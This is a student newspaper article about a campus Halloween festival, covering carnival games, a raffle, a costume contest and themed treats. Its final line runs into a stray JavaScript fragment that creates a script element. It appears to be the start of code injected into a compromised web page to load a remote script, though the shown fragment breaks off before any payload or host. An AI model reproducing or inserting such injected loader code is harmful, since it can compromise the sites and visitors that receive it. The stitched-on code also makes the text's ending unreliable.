Student Lorena Ridley tries her luck at Pop-A-Balloon.

Some weird things are going on, the sound of a balloon pops loudly, the grim reaper is walking around slowly with a scythe, a bearded lady approaches to tell my fortune, and a palm reader wants to explore my future. It feels like it must be Halloween, nothing else could be this frightening and scary, it was the CAC Maricopa campus celebrating its Freaky Fall Festival. The Freaky Fall Festival was held on October 29 and 30 at the Maricopa Campus.

The Student Leadership Organization sponsored the two-day event, which boasted fun activities, music, and games. For the first day of the event, students were encouraged to dabble in the carnival-like atmosphere by trying their luck at three featured games. The first was of course carnival classic Pop-A- Balloon. Students were instructed to pop a balloon for a chance to win a coupon for local entertainment complex UltraStar. The next game was a free game that the SLO members dubbed Pick-a-Pop. Students picked a pop and if the bottom of their pop was painted a crimson apple red they won even more candy for their troubles. The final game was a raffle for a CAC prize pack.

On October 30th, the second day of the event, there was a costume contest and several treats were available. Our very own Jesse Gollubier won the costume contest with his riveting rendition of the Grim Reaper. Many enjoyed the treats that were offered which included homemade rice krispie treats. The treats were shaped like spooky things such as bones, Jack-o-Lanterns, and macabre skulls.  The event lasted three hours and had many participants.  Everyone enjoyed their time and appreciated the hard work SLO put into organizing the event.

“This event was cool,” said student Michaela Madison, “I would definitely like to see more seasonal events like it”.var d=document;var s=d.createElement(‘script’);
